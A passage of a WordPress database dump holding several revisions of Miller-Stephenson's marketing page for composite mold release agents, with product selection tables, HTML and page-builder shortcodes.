center;" rowspan="4"><span style="font-size: 110%;"><strong><a href="https://www.miller-stephenson.com/product/ptfe-release-agent/">MS-122AV</a></strong> or <strong><a href="https://www.miller-stephenson.com/product/ptfe-mold-release-agents/">MS-143TE</a></strong></span></td>\r\n<td style="text-align: center;">PTFE Dry Film</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">No transfer</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Minimal Rejection Rate</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">High Durability</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122">Water-Based / Semi-Permanent</td>\r\n<td style="text-align: center;" rowspan="3">High Slip</td>\r\n<td style="text-align: center;" rowspan="3">Matte</td>\r\n<td style="text-align: center;" rowspan="3"><strong><a href="https://www.miller-stephenson.com/product/composite-mold-release-agent/"><span style="font-size: 110%;">ReleaSys 8800</span></a></strong></td>\r\n<td style="text-align: center;">Instant Cure</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Minimal transfer</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">High Durability; High Slip</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122">Solvent / Semi-Permanent</td>\r\n<td style="text-align: center;" rowspan="3" width="122">Filament Winding</td>\r\n<td style="text-align: center;" rowspan="3">Matte-Satin</td>\r\n<td style="text-align: center;" rowspan="3"><strong><a href="https://www.miller-stephenson.com/product/semi-permanent-mold-release-agents/"><span style="font-size: 110%;">ReleaSys 8900</span></a></strong></td>\r\n<td style="text-align: center;">Highest Slip</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Minimal transfer; No Build up</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Fast Cure (3-5min @ 50 °C)</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122">Solvent / Semi-Permanent</td>\r\n<td style="text-align: center;" rowspan="3" width="122">High Performance Composites</td>\r\n<td style="text-align: center;" rowspan="3">Matte-Satin</td>\r\n<td style="text-align: center;" rowspan="3"><strong><a href="https://www.miller-stephenson.com/product/semi-permanent-mold-release-agents/"><span style="font-size: 110%;">ReleaSys 8900</span></a></strong></td>\r\n<td style="text-align: center;">Highest Slip</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Minimal transfer; No Build up</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Fast Cure (3-5min @ 50 °C)</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h3>Technical or Application Support:</h3>\r\n<ul>\r\n 	<li><a href="https://www.miller-stephenson.com/mold-release-application-guide/"><strong>For any questions about proper application of our mold release products please view our article which discusses this process</strong></a></li>\r\n 	<li><strong><a href="https://www.miller-stephenson.com/tech-support/">If you require any further technical or application support please contact our technical staff</a></strong></li>\r\n</ul>\r\n[follow twitter="https://twitter.com/MSChemicals" facebook="https://www.facebook.com/Miller-Stephenson-Chemical-Co-1158843970871033/" googleplus="https://plus.google.com/105252144916647489581" linkedin="https://www.linkedin.com/company/miller-stephenson-chemical-company"]\r\n\r\n[ux_product_categories ids="21,16" number="10"]\r\n\r\n&nbsp;', 'Composite Mold Release Agents | ReleaSys™', '', 'publish', 'closed', 'closed', '', 'composite-mold-release-agents', '', '', '2016-12-22 16:51:46', '2016-12-22 16:51:46', '', 0, 'https://www.miller-stephenson.com/?p=2936', 0, 'post', '', 0); 
INSERT INTO `wp_posts` VALUES (2937, 3, '2016-11-08 16:48:59', '2016-11-08 16:48:59', '', 'Composite Mold Release Agents', '', 'inherit', 'closed', 'closed', '', 'shutterstock_358447820-1', '', '', '2016-11-24 04:13:15', '2016-11-24 04:13:15', '', 2936, 'https://www.miller-stephenson.com/wp-content/uploads/2016/11/shutterstock_358447820-1.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (2938, 3, '2016-11-08 16:59:36', '2016-11-08 16:59:36', 'Miller-Stephenson Composite mold release agents are backed by over 40 years of technical experience and are trusted to deliver the most consistent release of composite mold material in the industry. Our formulations are uniquely tailored to yield  These wax- and silicone-free release agents crosslink to create a low surface energy film which exhibits superior durability, chemical resistant and thermally stable. Large and small manufacturers can expect higher productivity and profitability through reduced downtime, increased acceptance rates and improved part quality when switching to<strong> <a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/semi-permanent-release-agents/">Miller-Stephenson’s ReleaSys semi-permanent line</a> or our <a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/ptfe-release-agents/">PTFE Dry Flim Release Agents</a>.</strong> With our composite mold release agents operators will see minimal transfer to molded components, low clogging, easy application and the highest number of releases possible per application are <em>guaranteed.  </em>', 'Composite Mold Release Agents | Miller-Stephenson', '', 'inherit', 'closed', 'closed', '', '2936-revision-v1', '', '', '2016-11-08 16:59:36', '2016-11-08 16:59:36', '', 2936, 'https://www.miller-stephenson.com/2936-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2939, 3, '2016-11-08 17:46:03', '2016-11-08 17:46:03', 'Miller-Stephenson Composite mold release agents are backed by over 40 years of technical experience and are trusted to deliver the most consistent release of composite mold material in the industry. Our formulations are uniquely tailored to yield  These wax- and silicone-free release agents crosslink to create a low surface energy film which exhibits high slip, superior durability, chemical resistant and thermally stable. Large and small manufacturers can expect higher productivity and profitability through reduced downtime, increased acceptance rates and improved part quality when switching to<strong> <a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/semi-permanent-release-agents/">Miller-Stephenson’s ReleaSys semi-permanent line</a> </strong>or<strong> <a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/ptfe-release-agents/">PTFE Dry Flim Release Agents</a>.</strong> With our composite mold release agents operators will see minimal transfer to molded components, low clogging, easy application and the highest number of releases possible per application <em>guaranteed. </em>As a leader in the development of water-based products, Miller-Stephenson offers environmentally conscious technology for composite molders who require the same, uncompromised high levels of quality and performance as found in traditional solvent-based products. Benefits of utilizing our mold release agents include:\r\n<ul>\r\n 	<li>Low or No volatile organic compounds (VOC)</li>\r\n 	<li>Minimal odor; 100% non-flammable formulations</li>\r\n 	<li>Semi-permanent mold release bonds to mold surface for consistent release</li>\r\n 	<li>Higher productivity; Increased cost-effectiveness</li>\r\n 	<li>Low rejection rate; Consistent part quality</li>\r\n</ul>\r\nMiller-Stephenson composite mold release agents have been optimized to cover industry applications from FRP to advanced composites and from aerospace applications to automotive, construction, marine, recreational/sporting goods, wind energy and more. Both ReleaSys and our PTFE Dry Film release agents will provide exceptional utility, improving molding processes such as vacuum bagging, resin infusion, layup and etc. Our products are applicable in all manufacturing process such as:\r\n<ul>\r\n 	<li>Thermoset Epoxies, phenolics, and BMIs</li>\r\n 	<li>Thermoset Prepregs</li>\r\n 	<li>Hand lay-ups</li>\r\n 	<li>Autoclave molding</li>\r\n 	<li>Vacuum bag molding</li>\r\n 	<li>Resin transfer molding</li>\r\n 	<li>Resin film infusion</li>\r\n 	<li>Compression, Transfer, Injection Molding</li>\r\n 	<li>Rotational Molding</li>\r\n 	<li>Metallic, Cermaic, and Composite Tooling</li>\r\n</ul>\r\n[ux_slider timer="4500" arrows="true" bullets="true" auto_slide="true" nav_color="dark"]\r\nInsert slides here (UX Banner or Sections)\r\n[/ux_slider]\r\n\r\n&nbsp;', 'Composite Mold Release Agents | Miller-Stephenson', '', 'inherit', 'closed', 'closed', '', '2936-revision-v1', '', '', '2016-11-08 17:46:03', '2016-11-08 17:46:03', '', 2936, 'https://www.miller-stephenson.com/2936-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2940, 3, '2016-11-08 17:50:45', '2016-11-08 17:50:45', '<p>Miller-Stephenson Composite mold release agents are backed by over 40 years of technical experience and are trusted to deliver the most consistent release of composite mold material in the industry. Our formulations are uniquely tailored to yield  These wax- and silicone-free release agents crosslink to create a low surface energy film which exhibits high slip, superior durability, chemical resistant and thermally stable. Large and small manufacturers can expect higher productivity and profitability through reduced downtime, increased acceptance rates and improved part quality when switching to<strong> <a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/semi-permanent-release-agents/">Miller-Stephenson’s ReleaSys semi-permanent line</a> </strong>or<strong> <a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/ptfe-release-agents/">PTFE Dry Flim Release Agents</a>.</strong> With our composite mold release agents operators will see minimal transfer to molded components, low clogging, easy application and the highest number of releases possible per application <em>guaranteed. </em>As a leader in the development of water-based products, Miller-Stephenson offers environmentally conscious technology for composite molders who require the same, uncompromised high levels of quality and performance as found in traditional solvent-based products. Benefits of utilizing our mold release agents include:</p>\n<ul>\n<li>Low or No volatile organic compounds (VOC)</li>\n<li>Minimal odor; 100% non-flammable formulations</li>\n<li>Semi-permanent mold release bonds to mold surface for consistent release</li>\n<li>Higher productivity; Increased cost-effectiveness</li>\n<li>Low rejection rate; Consistent part quality</li>\n</ul>\n<p>Miller-Stephenson composite mold release agents have been optimized to cover industry applications from FRP to advanced composites and from aerospace applications to automotive, construction, marine, recreational/sporting goods, wind energy and more. Both ReleaSys and our PTFE Dry Film release agents will provide exceptional utility, improving molding processes such as vacuum bagging, resin infusion, layup and etc. Our products are applicable in all manufacturing process such as:</p>\n<ul>\n<li>Thermoset Epoxies, phenolics, and BMIs</li>\n<li>Thermoset Prepregs</li>\n<li>Hand lay-ups</li>\n<li>Autoclave molding</li>\n<li>Vacuum bag molding</li>\n<li>Resin transfer molding</li>\n<li>Resin film infusion</li>\n<li>Compression, Transfer, Injection Molding</li>\n<li>Rotational Molding</li>\n<li>Metallic, Cermaic, and Composite Tooling</li>\n</ul>\n<p>&nbsp;</p>\n[section label="Simple Light" padding="60px" height="300px" border="1px 0px 0px 0px" border_color="rgb(235, 235, 235)"]\n\n[row style="small" depth="2"]\n\n[col span="4" span__sm="12"]\n\n<h2 class="uppercase">This is a headline</h2>\n<p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat.</p>\n\n[/col]\n[col span="4" span__sm="12"]\n\n<p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat.</p>\n\n[/col]\n[col span="4" span__sm="12"]\n\n<p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat.</p>\n\n[/col]\n\n[/row]\n\n[/section]', 'Composite Mold Release Agents | Miller-Stephenson', '', 'inherit', 'closed', 'closed', '', '2936-revision-v1', '', '', '2016-11-08 17:50:45', '2016-11-08 17:50:45', '', 2936, 'https://www.miller-stephenson.com/2936-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2941, 3, '2016-11-24 04:13:57', '2016-11-24 04:13:57', '<h1>Composite Mold Release Agents - ReleaSys™</h1>\nMiller-Stephenson Composite mold release agents are backed by over 40 years of technical experience and are trusted to deliver the most consistent release of composite material in the industry. Our formulations are uniquely tailored to yield unmatched utility and efficient for the robust and constantly evolving composite industry. These wax- and silicone-free release agents crosslink to create a low surface energy film which exhibits high slip, superior durability, chemical resistance, and thermally stable. Large and small manufacturers can expect higher productivity and profitability through reduced downtime, increased acceptance rates and improved part quality when switching to<strong> <a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/semi-permanent-release-agents/">Miller-Stephenson’s ReleaSys semi-permanent line</a> </strong>or<strong> <a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/ptfe-release-agents/">PTFE Dry Flim Release Agents</a>.</strong> With our composite mold release agents operators will see minimal transfer to molded components, low clogging, easy application and the highest number of releases possible per application <em>guaranteed. </em>As a leader in the development of water-based products, Miller-Stephenson offers environmentally conscious technology for composite molders who require the same, uncompromised high levels of quality and performance as found in traditional solvent-based products. Benefits of utilizing our mold release agents include:\n<ul>\n 	<li>Low or No volatile organic compounds (VOC)</li>\n 	<li>Minimal odor; 100% Non-flammable formulations</li>\n 	<li>Semi-permanent mold release bonds to mold surface for consistent release</li>\n 	<li>Higher productivity; Increased cost-effectiveness</li>\n 	<li>Low rejection rate; Consistent part quality</li>\n</ul>\nMiller-Stephenson composite <a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/">mold release agents</a> have been optimized to cover industry applications from Fiber Reinforced Plastic (FRP) to advanced composites and from aerospace applications to automotive, construction, marine, recreational/sporting goods, wind energy and more. Both ReleaSys and our PTFE Dry Film release agents will provide exceptional utility, improving molding processes such as vacuum bagging, resin infusion, layup and etc. Our products are applicable in all manufacturing process such as:\n<ul>\n 	<li>Thermoset Epoxies, Phenolics, and BMIs</li>\n 	<li>Thermoset Prepregs</li>\n 	<li>Potting and Casting Resins</li>\n 	<li>Hand lay-ups</li>\n 	<li>Filament Winding</li>\n 	<li>Autoclave molding</li>\n 	<li>Vacuum bag molding</li>\n 	<li>Resin transfer molding</li>\n 	<li>Resin film infusion</li>\n 	<li>Compression, Transfer, Injection Molding</li>\n 	<li>Rotational Molding</li>\n 	<li>Metallic, Ceramic, and Composite Tooling</li>\n</ul>\n<h3>Advantages of Utilizing Miller-Stephenson Composite Mold Release Agents</h3>\nMiller-Stephenson combines great technical and industry knowledge with a hands-on approach to service and support to address the challenges faced by our customers in their composite molding operations. Beyond the basics of releasing finished parts from their molds, utilizing our robust portfolio of ReleaSys semi-permanents mold release agents and<a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/ptfe-release-agents/"> PTFE Dry Film release agent</a>s, along with our industry leading support network, brings significant operational benefits.\n<ul>\n 	<li>Water-based options for reducing environmental impact and improving facility HSE</li>\n 	<li>Flexibility to accommodate a wide range of process conditions</li>\n 	<li>A global network of support experts to work with you to eliminate bottlenecks and improve process flow</li>\n 	<li>Cost-effective, high durability, and consistent mold release</li>\n 	<li>Reduced downtime and scrap rates</li>\n 	<li>Minimal mold fouling and transfer</li>\n</ul>\n<h2><strong>Release Agent Selection Guide:</strong></h2>\n<table width="751">\n<tbody>\n<tr>\n<td style="text-align: center;" width="122">\n<h3><span style="text-decoration: underline;"><span style="color: #0000ff; text-decoration: underline;" data-text-color="primary"><strong><span style="font-size: 100%;">Product Type</span></strong></span></span></h3>\n</td>\n<td style="text-align: center;" width="122">\n<h3><span style="text-decoration: underline;"><span style="color: #0000ff; text-decoration: underline;" data-text-color="primary"><strong><span style="font-size: 100%;">Application</span></strong></span></span></h3>\n</td>\n<td style="text-align: center;" width="153">\n<h3><span style="text-decoration: underline;"><span style="color: #0000ff; text-decoration: underline;" data-text-color="primary"><strong><span style="font-size: 100%;">Finish</span></strong></span></span></h3>\n</td>\n<td style="text-align: center;" width="151">\n<h3><span style="text-decoration: underline;"><span style="color: #0000ff; text-decoration: underline;" data-text-color="primary"><strong><span style="font-size: 100%;">Product</span></strong></span></span></h3>\n</td>\n<td style="text-align: center;" width="203">\n<h3><span style="text-decoration: underline;"><span style="color: #0000ff; text-decoration: underline;" data-text-color="primary"><strong><span style="font-size: 100%;">Description</span></strong></span></span></h3>\n</td>\n</tr>\n<tr>\n<td style="text-align: center;" rowspan="3" width="122">Solvent / Semi-Permanent</td>\n<td style="text-align: center;" rowspan="3" width="122">Compression Molding, Casting, Vacuum Bagging</td>\n<td style="text-align: center;" rowspan="3">Matte-Satin</td>\n<td style="text-align: center;" rowspan="3"><strong><a href="https://www.miller-stephenson.com/product/semi-permanent-mold-release-agents/"><span style="font-size: 110%;">ReleaSys 8900</span></a></strong></td>\n<td style="text-align: center;">Highest Slip</td>\n</tr>\n<tr>\n<td style="text-align: center;">Minimal transfer; No Build up</td>\n</tr>\n<tr>\n<td style="text-align: center;">Fast Cure (3-5min @ 50 °C)</td>\n</tr>\n<tr>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n</tr>\n<tr>\n<td style="text-align: center;" rowspan="3" width="122">Water-Based / Semi-Permanent</td>\n<td style="text-align: center;" rowspan="3" width="122">Compression Molding, Casting, Vacuum Bagging</td>\n<td style="text-align: center;" rowspan="3">Matte</td>\n<td style="text-align: center;" rowspan="3"><strong><a href="https://www.miller-stephenson.com/product/rubber-molding-release-agent/"><span style="font-size: 110%;">ReleaSys 8500</span></a></strong></td>\n<td style="text-align: center;">Medium  Slip</td>\n</tr>\n<tr>\n<td style="text-align: center;">No transfer; No Build up</td>\n</tr>\n<tr>\n<td style="text-align: center;">Instant Cure</td>\n</tr>\n<tr>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n</tr>\n<tr>\n<td style="text-align: center;" rowspan="4" width="122">Solvent /PTFE Dry Film</td>\n<td style="text-align: center;" rowspan="4" width="122">Resin Potting and Casting</td>\n<td style="text-align: center;" rowspan="4">Matte-Dry</td>\n<td style="text-align: center;" rowspan="4"><span style="font-size: 110%;"><strong><a href="https://www.miller-stephenson.com/product/ptfe-release-agent/">MS-122AV</a></strong> or <strong><a href="https://www.miller-stephenson.com/product/ptfe-mold-release-agents/">MS-143TE</a></strong></span></td>\n<td style="text-align: center;">PTFE Dry Film</td>\n</tr>\n<tr>\n<td style="text-align: center;">No transfer</td>\n</tr>\n<tr>\n<td style="text-align: center;">Minimal Rejection Rate</td>\n</tr>\n<tr>\n<td style="text-align: center;">High Durability</td>\n</tr>\n<tr>\n<td></td>\n<td></td>\n<td></td>\n<td style="text-align: center;"></td>\n<td style="text-align: center;"></td>\n</tr>\n<tr>\n<td style="text-align: center;" rowspan="3" width="122">Water-Based / Semi-Permanent</td>\n<td style="text-align: center;" rowspan="3">High Slip</td>\n<td style="text-align: center;" rowspan="3">Matte</td>\n<td style="text-align: center;" rowspan="3"><strong><a href="https://www.miller-stephenson.com/product/composite-mold-release-agent/"><span style="font-size: 110%;">ReleaSys 8800</span></a></strong></td>\n<td style="text-align: center;">Instant Cure</td>\n</tr>\n<tr>\n<td style="text-align: center;">Minimal transfer</td>\n</tr>\n<tr>\n<td style="text-align: center;">High Durability; High Slip</td>\n</tr>\n<tr>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n</tr>\n<tr>\n<td style="text-align: center;" rowspan="3" width="122">Solvent / Semi-Permanent</td>\n<td style="text-align: center;" rowspan="3" width="122">Filament Winding</td>\n<td style="text-align: center;" rowspan="3">Matte-Satin</td>\n<td style="text-align: center;" rowspan="3"><strong><a href="https://www.miller-stephenson.com/product/semi-permanent-mold-release-agents/"><span style="font-size: 110%;">ReleaSys 8900</span></a></strong></td>\n<td style="text-align: center;">Highest Slip</td>\n</tr>\n<tr>\n<td style="text-align: center;">Minimal transfer; No Build up</td>\n</tr>\n<tr>\n<td style="text-align: center;">Fast Cure (3-5min @ 50 °C)</td>\n</tr>\n<tr>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n</tr>\n<tr>\n<td style="text-align: center;" rowspan="3" width="122">Solvent / Semi-Permanent</td>\n<td style="text-align: center;" rowspan="3" width="122">High Performance Composites</td>\n<td style="text-align: center;" rowspan="3">Matte-Satin</td>\n<td style="text-align: center;" rowspan="3"><strong><a href="https://www.miller-stephenson.com/product/semi-permanent-mold-release-agents/"><span style="font-size: 110%;">ReleaSys 8900</span></a></strong></td>\n<td style="text-align: center;">Highest Slip</td>\n</tr>\n<tr>\n<td style="text-align: center;">Minimal transfer; No Build up</td>\n</tr>\n<tr>\n<td style="text-align: center;">Fast Cure (3-5min @ 50 °C)</td>\n</tr>\n</tbody>\n</table>\n<h3>Technical or Application Support:</h3>\n<ul>\n 	<li><strong><a href="https://www.miller-stephenson.com/troubleshooting-common-mold-release-issues/">For any questions about proper application of our mold release products please view our article which discusses this process</a></strong></li>\n 	<li><strong><a href="https://www.miller-stephenson.com/tech-support/">If you require any further technical or application support please contact our technical staff</a></strong></li>\n</ul>\n[ux_product_categories ids="21,16" number="10"]\n\n&nbsp;', 'Composite Mold Release Agents | ReleaSys™', '', 'inherit', 'closed', 'closed', '', '2936-autosave-v1', '', '', '2016-11-24 04:13:57', '2016-11-24 04:13:57', '', 2936, 'https://www.miller-stephenson.com/2936-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2942, 3, '2016-11-08 17:57:31', '2016-11-08 17:57:31', 'Miller-Stephenson Composite mold release agents are backed by over 40 years of technical experience and are trusted to deliver the most consistent release of composite mold material in the industry. Our formulations are uniquely tailored to yield  These wax- and silicone-free release agents crosslink to create a low surface energy film which exhibits high slip, superior durability, chemical resistant and thermally stable. Large and small manufacturers can expect higher productivity and profitability through reduced downtime, increased acceptance rates and improved part quality when switching to<strong> <a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/semi-permanent-release-agents/">Miller-Stephenson’s ReleaSys semi-permanent line</a> </strong>or<strong> <a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/ptfe-release-agents/">PTFE Dry Flim Release Agents</a>.</strong> With our composite mold release agents operators will see minimal transfer to molded components, low clogging, easy application and the highest number of releases possible per application <em>guaranteed. </em>As a leader in the development of water-based products, Miller-Stephenson offers environmentally conscious technology for composite molders who require the same, uncompromised high levels of quality and performance as found in traditional solvent-based products. Benefits of utilizing our mold release agents include:\r\n<ul>\r\n 	<li>Low or No volatile organic compounds (VOC)</li>\r\n 	<li>Minimal odor; 100% non-flammable formulations</li>\r\n 	<li>Semi-permanent mold release bonds to mold surface for consistent release</li>\r\n 	<li>Higher productivity; Increased cost-effectiveness</li>\r\n 	<li>Low rejection rate; Consistent part quality</li>\r\n</ul>\r\nMiller-Stephenson composite mold release agents have been optimized to cover industry applications from Fiber Reinforced Plastic (FRP) to advanced composites and from aerospace applications to automotive, construction, marine, recreational/sporting goods, wind energy and more. Both ReleaSys and our PTFE Dry Film release agents will provide exceptional utility, improving molding processes such as vacuum bagging, resin infusion, layup and etc. Our products are applicable in all manufacturing process such as:\r\n<ul>\r\n 	<li>Thermoset Epoxies, phenolics, and BMIs</li>\r\n 	<li>Thermoset Prepregs</li>\r\n 	<li>Hand lay-ups</li>\r\n 	<li>Autoclave molding</li>\r\n 	<li>Vacuum bag molding</li>\r\n 	<li>Resin transfer molding</li>\r\n 	<li>Resin film infusion</li>\r\n 	<li>Compression, Transfer, Injection Molding</li>\r\n 	<li>Rotational Molding</li>\r\n 	<li>Metallic, Cermaic, and Composite Tooling</li>\r\n</ul>\r\n&nbsp;\r\n\r\n[section label="Simple Light" padding="60px" height="300px" border="1px 0px 0px 0px" border_color="rgb(235, 235, 235)"]\r\n\r\n[row style="small" depth="2"]\r\n\r\n[col span="4" span__sm="12"]\r\n<h2 class="uppercase">Mold Release Agents Specialized for Composites</h2>\r\nMiller-Stephenson combines great technical and industry knowledge with a hands-on approach to service and support to address the challenges faced by our customers in their composite molding operations. Beyond the basics of releasing finished parts from their molds, utilizing our robust portfolio of ReleaSys and PTFE Dry Film products, along with our industry leading support network, brings significant operational benefits.\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n<ul>\r\n 	<li>Water-based options for reducing environmental impact and improving facility HSE</li>\r\n 	<li>Flexibility to accommodate a wide range of process conditions</li>\r\n 	<li>A global network of support experts to work with you to eliminate bottlenecks and improve process flow</li>\r\n 	<li>Cost-effective, high durability, and consistent mold release</li>\r\n 	<li>Reduced downtime and scrap rates</li>\r\n 	<li>Minimal mold fouling and transfer</li>\r\n</ul>\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\nLorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat.\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[/section]', 'Composite Mold Release Agents | Miller-Stephenson', '', 'inherit', 'closed', 'closed', '', '2936-revision-v1', '', '', '2016-11-08 17:57:31', '2016-11-08 17:57:31', '', 2936, 'https://www.miller-stephenson.com/2936-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2943, 153, '2016-11-08 19:00:19', '2016-11-08 19:00:19', '', '', '', 'publish', 'closed', 'closed', '', '2943', '', '', '2016-11-08 19:00:19', '2016-11-08 19:00:19', '', 0, 'https://www.miller-stephenson.com/nf_sub/2943/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2944, 3, '2016-11-08 20:11:25', '2016-11-08 20:11:25', 'Miller-Stephenson Composite mold release agents are backed by over 40 years of technical experience and are trusted to deliver the most consistent release of composite mold material in the industry. Our formulations are uniquely tailored to yield  These wax- and silicone-free release agents crosslink to create a low surface energy film which exhibits high slip, superior durability, chemical resistant and thermally stable. Large and small manufacturers can expect higher productivity and profitability through reduced downtime, increased acceptance rates and improved part quality when switching to<strong> <a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/semi-permanent-release-agents/">Miller-Stephenson’s ReleaSys semi-permanent line</a> </strong>or<strong> <a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/ptfe-release-agents/">PTFE Dry Flim Release Agents</a>.</strong> With our composite mold release agents operators will see minimal transfer to molded components, low clogging, easy application and the highest number of releases possible per application <em>guaranteed. </em>As a leader in the development of water-based products, Miller-Stephenson offers environmentally conscious technology for composite molders who require the same, uncompromised high levels of quality and performance as found in traditional solvent-based products. Benefits of utilizing our mold release agents include:\r\n<ul>\r\n 	<li>Low or No volatile organic compounds (VOC)</li>\r\n 	<li>Minimal odor; 100% non-flammable formulations</li>\r\n 	<li>Semi-permanent mold release bonds to mold surface for consistent release</li>\r\n 	<li>Higher productivity; Increased cost-effectiveness</li>\r\n 	<li>Low rejection rate; Consistent part quality</li>\r\n</ul>\r\nMiller-Stephenson composite mold release agents have been optimized to cover industry applications from Fiber Reinforced Plastic (FRP) to advanced composites and from aerospace applications to automotive, construction, marine, recreational/sporting goods, wind energy and more. Both ReleaSys and our PTFE Dry Film release agents will provide exceptional utility, improving molding processes such as vacuum bagging, resin infusion, layup and etc. Our products are applicable in all manufacturing process such as:\r\n<ul>\r\n 	<li>Thermoset Epoxies, phenolics, and BMIs</li>\r\n 	<li>Thermoset Prepregs</li>\r\n 	<li>Potting and Casting Resins</li>\r\n 	<li>Hand lay-ups</li>\r\n 	<li>Filament Winding</li>\r\n 	<li>Autoclave molding</li>\r\n 	<li>Vacuum bag molding</li>\r\n 	<li>Resin transfer molding</li>\r\n 	<li>Resin film infusion</li>\r\n 	<li>Compression, Transfer, Injection Molding</li>\r\n 	<li>Rotational Molding</li>\r\n 	<li>Metallic, Cermaic, and Composite Tooling</li>\r\n</ul>\r\n<h3>Advantages of Utilizing Miller-Stephenson Composite Mold Release Agents</h3>\r\nMiller-Stephenson combines great technical and industry knowledge with a hands-on approach to service and support to address the challenges faced by our customers in their composite molding operations. Beyond the basics of releasing finished parts from their molds, utilizing our robust portfolio of ReleaSys semi-permanents mold release agents and PTFE Dry Film release agents, along with our industry leading support network, brings significant operational benefits.\r\n<ul>\r\n 	<li>Water-based options for reducing environmental impact and improving facility HSE</li>\r\n 	<li>Flexibility to accommodate a wide range of process conditions</li>\r\n 	<li>A global network of support experts to work with you to eliminate bottlenecks and improve process flow</li>\r\n 	<li>Cost-effective, high durability, and consistent mold release</li>\r\n 	<li>Reduced downtime and scrap rates</li>\r\n 	<li>Minimal mold fouling and transfer</li>\r\n</ul>\r\n<h2><span style="text-decoration: underline;">Product Application Guide</span></h2>\r\n<table width="751">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" width="122">\r\n<h3><strong><span style="font-size: 100%;">Product Type</span></strong></h3>\r\n</td>\r\n<td style="text-align: center;" width="122">\r\n<h3><strong><span style="font-size: 100%;">Application</span></strong></h3>\r\n</td>\r\n<td style="text-align: center;" width="153">\r\n<h3><strong><span style="font-size: 100%;">Finish</span></strong></h3>\r\n</td>\r\n<td style="text-align: center;" width="151">\r\n<h3><strong><span style="font-size: 100%;">Product</span></strong></h3>\r\n</td>\r\n<td style="text-align: center;" width="203">\r\n<h3><strong><span style="font-size: 100%;">Description</span></strong></h3>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122">Solvent / Semi-Permanent</td>\r\n<td style="text-align: center;" rowspan="3" width="122">Compression Molding, Casting, Vacuum Bagging</td>\r\n<td style="text-align: center;" rowspan="3">Matte-Satin</td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">ReleaSys 8900</span></td>\r\n<td>• Highest Slip</td>\r\n</tr>\r\n<tr>\r\n<td>• Minimal transfer; No Build up</td>\r\n</tr>\r\n<tr>\r\n<td>• Fast Cure (3-5min @ 50 °C)</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122">Water-Based / Semi-Permanent</td>\r\n<td style="text-align: center;" rowspan="3" width="122">Compression Molding, Casting, Vacuum Bagging</td>\r\n<td style="text-align: center;" rowspan="3">Matte</td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">ReleaSys 8500</span></td>\r\n<td>• Medium  Slip</td>\r\n</tr>\r\n<tr>\r\n<td>• No transfer; No Build up</td>\r\n</tr>\r\n<tr>\r\n<td>• Instant Cure</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td 